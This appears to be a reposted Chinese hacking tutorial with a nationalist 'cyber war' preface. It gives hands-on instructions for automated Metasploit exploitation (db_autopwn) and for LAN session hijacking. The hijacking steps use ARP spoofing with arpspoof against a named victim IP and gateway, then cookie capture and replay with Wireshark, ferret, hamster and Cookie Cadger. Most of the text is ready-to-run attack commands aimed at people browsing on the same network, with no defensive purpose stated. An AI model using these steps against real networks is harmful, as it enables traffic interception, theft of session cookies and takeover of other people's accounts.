前言:中美网战打响的那一刹那,中国已经落后很多年。然而,我们一直没有停止学习的脚步,“师夷长技以制夷”——我们一直奋斗在战争的第一线。经过漫长的沉淀,原来你就在身边不远处。
注:实际过程中可能会遇到以下错误。 错误描述: msf> db_status postgres selected, no connection 解决办法: service postgres start msfdb init 执行命令后,重启msf便会自动连接到数据库。 错误描述 msf > db_autopwn -t -p -r -e [-] The db_autopwn command is DEPRECATED [-] See http:///xY65Zr instead 解决办法: 到GitHub上下载该插件,并放到/usr/share/metasploit-framework/plugins目录下即可。 下载地址: https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
工具:arpspoof、wireshark、ferret、hamster ① 开启数据转发: echo 1 >/proc/sys/net/ipv4/ip_forward ② 开启arp欺骗: arpspoof -i eth0 -t 192.168.0.71 192.168.0.254 ③ 开启wireshark进行抓包,抓包后需要导出为pcap文件; ④ 使用ferret解析文件,生成hasmter.txt文件: ferret -r cookie.pcap ⑤ 打开hamster软件,然后将浏览器的代理设置为 127.0.0.1:1234; ⑥ 在浏览器中访问 http://127.0.0.1:1234 ,在页面中点击抓到的网页链接获得会话。 工具:ferret、hamster ① 开启ferret抓包: ferret -i eth0 ② 开启hamster: hamster ③ 打开浏览器并设置好代理,然后访问http://127.0.0.1:1234,在页面中选择网卡可实时查看抓取到的会话。 工具:Cookie Cadger ① 打开软件并设置好网卡,然后开启抓包; java -jar CookieCadger.jar ② 当局域网内有人上网涉及敏感信息,软件就会抓到数据包并罗列出来,只需点选某个网址,加载网站Cookies(Load Domain Cookies)即可实现会话劫持。 注: ① 实测中点击加载cookies后,软件一直“Loading request into browser,please wait...”,使用浏览器浏览也没有劫持到。 ② 虽然是java编写的软件,但是在Win10下没找到网卡,无法使用。 Q 8.1 安装ferret时提示“E: 无法定位软件包 ferret” ① 设置更新源: vim /etc/apt/sources.list // 打开更新源配置文件 deb http://http./kali kali-rolling main non-free contrib ② 更新全部软件包: apt-get update && apt-get dist-upgrade ③ 安装ferret: apt-get install ferret-sidejack // 注意软件名是ferret-sidejack不是ferret,ferret是别的软件 注:有可能需要添加对32位的支持dpkg --add-architecture i386 Q 8.2 获取Cookie Cadger wget https://www.cookiecadger.com/files/CookieCadger-1.08.jar ![]() |
|
来自: 西北望msm66g9f > 《编程》